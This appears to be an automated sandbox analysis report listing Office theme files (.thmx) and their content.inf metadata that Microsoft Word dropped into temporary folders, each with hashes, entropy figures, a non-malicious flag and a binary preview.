                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):278
                                    Entropy (8bit):3.516359852766808
                                    Encrypted:false
                                    SSDEEP:6:Q+sxnxUXKwRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6qymD0wbnKNAH/lMz1
                                    MD5:960E28B1E0AB3522A8A8558C02694ECF
                                    SHA1:8387E9FD5179A8C811CCB5878BAC305E6A166F93
                                    SHA-256:2707FCA8CEC54DF696F19F7BCAD5F0D824A2AC01B73815DE58F3FCF0AAB3F6A0
                                    SHA-512:89EA06BA7D18B0B1EA624BBC052F73366522C231BD3B51745B92CF056B445F9D655F9715CBDCD3B2D02596DB4CD189D91E2FE581F2A2AA2F6D814CD3B004950A
                                    Malicious:false
                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.a.r.c.e.l...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                    C:\Users\user\AppData\Local\Temp\TCDA0D6.tmp\Parallax.thmx

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):924687
                                    Entropy (8bit):7.824849396154325
                                    Encrypted:false
                                    SSDEEP:12288:lsadD3eLxI8XSh4yDwFw8oWR+6dmw2ZpQDKpazILv7Jzny/ApcWqyOpEZULn:qLxI8XSh4yUF/oWR+mLKpYIr7l3ZQ7n
                                    MD5:97EEC245165F2296139EF8D4D43BBB66
                                    SHA1:0D91B68CCB6063EB342CFCED4F21A1CE4115C209
                                    SHA-256:3C5CF7BDB27592791ADF4E7C5A09DDE4658E10ED8F47845064DB1153BE69487C
                                    SHA-512:8594C49CAB6FF8385B1D6E174431DAFB0E947A8D7D3F200E622AE8260C793906E17AA3E6550D4775573858EA1243CCBF7132973CD1CF7A72C3587B9691535FF8
                                    Malicious:false
                                    Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.

                                    C:\Users\user\AppData\Local\Temp\TCDA0D6.tmp\content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):282
                                    Entropy (8bit):3.51145753448333
                                    Encrypted:false
                                    SSDEEP:6:Q+sxnxUXKsWkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6svymD0wbnKNAH/lMz1
                                    MD5:7956D2B60E2A254A07D46BCA07D0EFF0
                                    SHA1:AF1AC8CA6FE2F521B2EE2B7ABAB612956A65B0B5
                                    SHA-256:C92B7FD46B4553FF2A656FF5102616479F3B503341ED7A349ECCA2E12455969E
                                    SHA-512:668F5D0EFA2F5168172E746A6C32820E3758793CFA5DB6791DE39CB706EF7123BE641A8134134E579D3E4C77A95A0F9983F90E44C0A1CF6CDE2C4E4C7AF1ECA0
                                    Malicious:false
                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.a.r.a.l.l.a.x...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                    C:\Users\user\AppData\Local\Temp\TCDA1E1.tmp\Quotable.thmx

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):966946
                                    Entropy (8bit):7.8785200658952
                                    Encrypted:false
                                    SSDEEP:24576:qBcvGBGhXQir6H1ws6+iU0YuA35VuinHX2NPs:ccvGBGdQ5CsMxQVj3yPs
                                    MD5:F03AB824395A8F1F1C4F92763E5C5CAD
                                    SHA1:A6E021918C3CEFFB6490222D37ECEED1FC435D52
                                    SHA-256:D96F7A63A912CA058FB140138C41DCB3AF16638BA40820016AF78DF5D07FAEDD
                                    SHA-512:0241146B63C938F11045FB9DF5360F63EF05B9B3DD1272A3E3E329A1BFEC5A4A645D5472461DE9C06CFE4ADB991FE96C58F0357249806C341999C033CD88A7AF
                                    Malicious:false
                                    Preview:PK..........1A.......F`......[Content_Types].xml..n.@.._.y.ac $..,........-..g@.u.G.+t.:........D1...itgt>...k..lz;].8Kg^....N.l..........0.~}....ykk.A`..N..\...2+.e.c..r..P+....I.e.......|.^/.vc{......s..z....f^...8...'.zcN&.<....}.K.'h..X..y.c.qnn.s%...V('~v.W.......I%nX`.....G.........r.Gz.E..M.."..M....6n.a..V.K6.G?Qqz..............\e.K.>..lkM...`...k.5...sb.rbM8..8..9..pb..R..{>$..C.>......X..iw.'..a.09CPk.n...v....5n..Uk\...SC...j.Y.....Vq..vk>mi......z..t....v.]...n...e(.....s.i......]...q.r....~.WV/.j.Y......K..-.. Z..@.\.P..W...A..X8.`$C.F(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........c..0F...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP..........(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-.............0A...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP.........w(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........T..GI..~.....~....PK..........1A.s@.....O......._rels/.rels...J.

                                    C:\Users\user\AppData\Local\Temp\TCDA1E1.tmp\content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):282
                                    Entropy (8bit):3.5323495192404475
                                    Encrypted:false
                                    SSDEEP:6:Q+sxnxUXhduDARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyxdumymD0wbnKNAH/lMz1
                                    MD5:BD6B5A98CA4E6C5DBA57C5AD167EDD00
                                    SHA1:CCFF7F635B31D12707DC0AC6D1191AB5C4760107
                                    SHA-256:F22248FE60A55B6C7C1EB31908FAB7726813090DE887316791605714E6E3CEF7
                                    SHA-512:A178299461015970AF23BA3D10E43FCA5A6FB23262B0DD0C5DDE01D338B4959F222FD2DC2CC5E3815A69FDDCC3B6B4CB8EE6EC0883CE46093C6A59FF2B042BC1
                                    Malicious:false
                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .Q.u.o.t.a.b.l.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                    C:\Users\user\AppData\Local\Temp\TCDA232.tmp\Wood_Type.thmx

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):1649585
                                    Entropy (8bit):7.875240099125746
                                    Encrypted:false
                                    SSDEEP:24576:L368X6z95zf5BbQ6U79dYy2HiTIxRboyM/LZTl5KnCc:r68kb7UTYxGIxmnp65
                                    MD5:35200E94CEB3BB7A8B34B4E93E039023
                                    SHA1:5BB55EDAA4CDF9D805E36C36FB092E451BDDB74D
                                    SHA-256:6CE04E8827ABAEA9B292048C5F84D824DE3CEFDB493101C2DB207BD4475AF1FD
                                    SHA-512:ED80CEE7C22D10664076BA7558A79485AA39BE80582CEC9A222621764DAE5EFA70F648F8E8C5C83B6FE31C2A9A933C814929782A964A47157505F4AE79A3E2F9
                                    Malicious:false
                                    Preview:PK..........1A..u._....P......[Content_Types].xml..Ms.@.....!...=.7....;a.h.&Y..l..H~..`;...d..g/..e..,M..C...5...#g/."L..;...#. ]..f...w../._.2Y8..X.[..7._.[...K3..#.4......D.]l.?...~.&J&....p..wr-v.r.?...i.d.:o....Z.a|._....|.d...A....A".0.J......nz....#.s.m.......(.]........~..XC..J......+.|...(b}...K!._.D....uN....u..U..b=.^..[...f...f.,...eo..z.8.mz....."..D..SU.}ENp.k.e}.O.N....:^....5.d.9Y.N..5.d.q.^s..}R...._E..D...o..o...o...f.6;s.Z]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...S.....0.zN.... ...>..>..>..>..>..>..>........e...,..7...F(L.....>.ku...i...i...i...i...i...i...i........yi.....G...1.....j...r.Z]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o|^Z....Q}.;.o...9.Z..\.V...............................jZ......k.pT...0.zN.... ...>..>..>..>..>..>..>........e...,..7...f(L.....>.ku...i...i...i...i...i...i...i........yi.......n.....{.._f...0...PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...

                                    C:\Users\user\AppData\Local\Temp\TCDA232.tmp\content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):284
                                    Entropy (8bit):3.5552837910707304
                                    Encrypted:false
                                    SSDEEP:6:Q+sxnxUXtLARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnygymD0wbnKNAH/lMz1
                                    MD5:5728F26DF04D174DE9BDFF51D0668E2A
                                    SHA1:C998DF970655E4AF9C270CC85901A563CFDBCC22
                                    SHA-256:979DAFD61C23C185830AA3D771EDDC897BEE87587251B84F61776E720ACF9840
                                    SHA-512:491B36AC6D4749F7448B9A3A6E6465E8D97FB30F33EF5019AF65660E98F4570711EFF5FC31CBB8414AD9355029610E6F93509BC4B2FB6EA79C7CB09069DE7362
                                    Malicious:false
                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .W.o.o.d._.T.y.p.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                    C:\Users\user\AppData\Local\Temp\TCDA243.tmp\Berlin.thmx

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):976001
                                    Entropy (8bit):7.791956689344336
                                    Encrypted:false
                                    SSDEEP:24576:zHM7eZGgFiHMRej4N9tpytNZ+tIw5ErZBImlX0m:zHM7eZGgFiHMRej++NZ+F5WvllZ
                                    MD5:9E563D44C28B9632A7CF4BD046161994
                                    SHA1:D3DB4E5F5B1CC6DD08BB3EBF488FF05411348A11
                                    SHA-256:86A70CDBE4377C32729FD6C5A0B5332B7925A91C492292B7F9C636321E6FAD86
                                    SHA-512:8EB14A1B10CB5C7607D3E07E63F668CFC5FC345B438D39138D62CADF335244952FBC016A311D5CB8A71D50660C49087B909528FC06C1D10AF313F904C06CBD5C
                                    Malicious:false
                                    Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                    C:\Users\user\AppData\Local\Temp\TCDA243.tmp\content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):278
                                    Entropy (8bit):3.5270134268591966
                                    Encrypted:false
                                    SSDEEP:6:Q+sxnxUXa3Y1kRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyt1mymD0wbnKNAH/lMz1
                                    MD5:327DA4A5C757C0F1449976BE82653129
                                    SHA1:CF74ECDF94B4A8FD4C227313C8606FD53B8EEA71
                                    SHA-256:341BABD413AA5E8F0A921AC309A8C760A4E9BA9CFF3CAD3FB2DD9DF70FD257A6
                                    SHA-512:9184C3FB989BB271B4B3CDBFEFC47EA8ABEB12B8904EE89797CC9823F33952BD620C061885A5C11BBC1BD3978C4B32EE806418F3F21DA74F1D2DB9817F6E167E
                                    Malicious:false
                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.e.r.l.i.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                    C:\Users\user\AppData\Local\Temp\TCDA575.tmp\Droplet.thmx

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):1750795
                                    Entropy (8bit):7.892395931401988
                                    Encrypted:false
                                    SSDEEP:24576:DyeAqDJpUDH3xk8ZKIBuX3TPtd36v4o5d4PISMETGBP6eUP+xSeW3v0HKPsc:uRqUjSTPtd36AFDM/BP6eUeW3v0Fc
                                    MD5:529795E0B55926752462CBF32C14E738
                                    SHA1:E72DFF8354DF2CB6A5698F14BBD1805D72FEEAFF
                                    SHA-256:8D341D1C24176DC6B67104C2AF90FABD3BFF666CCC0E269381703D7659A6FA05
                                    SHA-512:A51F440F1E19C084D905B721D0257F7EEE082B6377465CB94E677C29D4E844FD8021D0B6BA26C0907B72B84157C60A3EFEDFD96C16726F6ABEA8D896D78B08CE
                                    Malicious:false
                                    Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                    C:\Users\user\AppData\Local\Temp\TCDA575.tmp\content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):280
                                    Entropy (8bit):3.528155916440219
                                    Encrypted:false
                                    SSDEEP:6:Q+sxnxUXcmlDuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyMmloymD0wbnKNAH/lMz1
                                    MD5:AA7B919B21FD42C457948DE1E2988CB3
                                    SHA1:19DA49CF5540E5840E95F4E722B54D44F3154E04
                                    SHA-256:5FFF5F1EC1686C138192317D5A67E22A6B02E5AAE89D73D4B19A492C2F5BE2F9
                                    SHA-512:01D27377942F69A0F2FE240DD73A1F97BB915E19D3D716EE4296C6EF8D8933C80E4E0C02F6C9FA72E531246713364190A2F67F43EDBE12826A1529BC2A629B00
                                    Malicious:false
                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.r.o.p.l.e.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                    C:\Users\user\AppData\Local\Temp\TCDA576.tmp\Gallery.thmx

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):1091485
                                    Entropy (8bit):7.906659368807194
                                    Encrypted:false
                                    SSDEEP:24576:oBpmCkw3Tg/euEB+UdoC4k7ytHkHA6B/puqW2MIkTeSBmKrZHQ:MR3c/AseydwppC7veSBmWHQ
                                    MD5:2192871A20313BEC581B277E405C6322
                                    SHA1:1F9A6A5E10E1C3FFEB6B6725C5D2FA9ECDF51085
                                    SHA-256:A06B302954A4C9A6A104A8691864A9577B0BFEA240B0915D9BEA006E98CDFFEC
                                    SHA-512:6D8844D2807BB90AEA6FE0DDDB9C67542F587EC9B7FC762746164B2D4A1A99EF8368A70C97BAD7A986AAA80847F64408F50F4707BB039FCCC509133C231D53B9
                                    Malicious:false
                                    Preview:PK...........G`.jaV....P......[Content_Types].xml...n.@...W......T@.mwM.E....)....y...H}.N..ll8.h5g6Q.=3_......?...x..e^Di.p.^.ud...(Y/..{w..r..9.../M...Q*{..E...(.4..>..y,.>..~&..b-.a.?..4Q2Q=.2.......m....>-....;]......N'..A...g.D.m.@(}..'.3Z....#....(+....-q<uq.+....?....1.....Y?Oy......O"..J?....Q$zT.].7.N..Q Wi.....<.........-..rY....hy.x[9.b.%-<.V?.(......;r.+...Q<.;U.....4...!'k...s.&..)'k...d.s..}R....o".D.I..7..7.KL.7..Z.....v..b.5.2].f....l.t....Z...Uk...j.&.U-....&>.ia1..9lhG..Q.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.........j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oT/-c..`....7FaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,..7...&(L.....>.kw...i...i...i...i...i...i...i.......I...U_.....vT.....}..\...v..W.!-W.!-W.!-W.!-W.!-W.!-W.!-W.U...7.....k.pT...0..O.... ...>..>..>..>..>..>..>......f..2V}....W>jO....5..].?.o..oPK...........G.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70.

                                    C:\Users\user\AppData\Local\Temp\TCDA576.tmp\content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):280
                                    Entropy (8bit):3.5301133500353727
                                    Encrypted:false
                                    SSDEEP:6:Q+sxnxUXp2pRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyZ2vymD0wbnKNAH/lMz1
                                    MD5:1C5D58A5ED3B40486BC22B254D17D1DD
                                    SHA1:69B8BB7B0112B37B9B5F9ADA83D11FBC99FEC80A
                                    SHA-256:EBE031C340F04BB0235FE62C5A675CF65C5CC8CE908F4621A4F5D7EE85F83055
                                    SHA-512:4736E4F26C6FAAB47718945BA54BD841FE8EF61F0DBA927E5C4488593757DBF09689ABC387A8A44F7C74AA69BA89BEE8EA55C87999898FEFEB232B1BA8CC7086
                                    Malicious:false
                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .G.a.l.l.e.r.y...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                    C:\Users\user\AppData\Local\Temp\TCDA586.tmp\Savon.thmx

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):1204049
                                    Entropy (8bit):7.92476783994848
                                    Encrypted:false
                                    SSDEEP:24576:+3zSQBxvOUIpHLYTCEmS1Wu09jRalJP3sdgnmAOFt0zU4L0MRx5QNn5:+bvI5UTCPu09qP3JPOFoR4N5
                                    MD5:FD5BBC58056522847B3B75750603DF0C
                                    SHA1:97313E85C0937739AF7C7FC084A10BF202AC9942
                                    SHA-256:44976408BD6D2703BDBE177259061A502552193B1CD05E09B698C0DAC3653C5F
                                    SHA-512:DBD72827044331215A7221CA9B0ECB8809C7C79825B9A2275F3450BAE016D7D320B4CA94095F7CEF4372AC63155C78CA4795E23F93166D4720032ECF9F932B8E
                                    Malicious:false
                                    Preview:PK..........1A..d T....P......[Content_Types].xml..Ms.@.....!...=.7....kX 5o.,L..<..........d..g/..dw.]...C...9...#g/."L..;...#. ]..f...w../._.3Y8..X.[..7._.[...K3..3.4......D.]l.?...~.&J&...s...;...H9...e.3.q.....k-.0>Lp:.7..eT...Y...P...OVg.....G..).aV...\Z.x...W.>f...oq.8.....I?Ky...g..."...J?....A$zL.].7.M.^..\....C..d/;.J0.7k.X4.e..?N{....r.."LZx.H?. ......;r.+...A<.;U.....4...!'k...s.&..)'k...d..d......._E..D...o..o...o...f.7;s..]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...s.....0..O.... ...>..>..>..>..>..>..>.........2V}......Q}#.&T...rU....\..\..\..\..\..\..\..\.W..W.^Z....Q}c;.o...>.Z..\.v...............................*Z....K.X.5X8.obG.MP.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.M.).....j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oZ/-c..`....7CaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,...|...].k.........PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...

                                    C:\Users\user\AppData\Local\Temp\TCDA586.tmp\content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):276
                                    Entropy (8bit):3.5364757859412563
                                    Encrypted:false
                                    SSDEEP:6:Q+sxnxUXARkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnywMymD0wbnKNAH/lMz1
                                    MD5:CD465E8DA15E26569897213CA9F6BC9C
                                    SHA1:9EA9B5E6C9B7BF72A777A21EC17FD82BC4386D4C
                                    SHA-256:D4109317C2DBA1D7A94FC1A4B23FA51F4D0FC8E1D9433697AAFA72E335192610
                                    SHA-512:869A42679F96414FE01FE1D79AF7B33A0C9B598B393E57E0E4D94D68A4F2107EC58B63A532702DA96A1F2F20CE72E6E08125B38745CD960DF62FE539646EDD8D
                                    Malicious:false
                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .S.a.v.o.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                    C:\Users\user\AppData\Local\Temp\TCDA5A6.tmp\Circuit.thmx

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):1463634
                                    Entropy (8bit):7.898382456989258
                                    Encrypted:false
                                    SSDEEP:24576:75MGNW/UpLkupMAqDJhNHK4/TuiKbdhbZM+byLH/:7ZwUpLkulkHK46iiDZHeLH/
                                    MD5:ACBA78931B156E4AF5C4EF9E4AB3003B
                                    SHA1:2A1F506749A046ECFB049F23EC43B429530EC489
                                    SHA-256:943E4044C40ABA93BD7EA31E8B5EBEBD7976085E8B1A89E905952FA8DAC7B878
                                    SHA-512:2815D912088BA049F468CA9D65B92F8951A9BE82AB194DBFACCF0E91F0202820F5BC9535966654D28F69A8B92D048808E95FEA93042D8C5DEA1DCB0D58BE5175
                                    Malicious:false
                                    Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                    C:\Users\user\AppData\Local\Temp\TCDA5A6.tmp\content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):280
                                    Entropy (8bit):3.5286004619027067
                                    Encrypted:false
                                    SSDEEP:6:Q+sxnxUXOzXkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6WymD0wbnKNAH/lMz1
                                    MD5:40FF521ED2BA1B015F17F0B0E5D95068
                                    SHA1:0F29C084311084B8FDFE67855884D8EB60BDE1A6
                                    SHA-256:CC3575BA195F0F271FFEBA6F6634BC9A2CF5F3BE448F58DBC002907D7C81CBBB
                                    SHA-512:9507E6145417AC730C284E58DC6B2063719400B395615C40D7885F78F57D55B251CB9C954D573CB8B6F073E4CEA82C0525AE90DEC68251C76A6F1B03FD9943C0
                                    Malicious:false
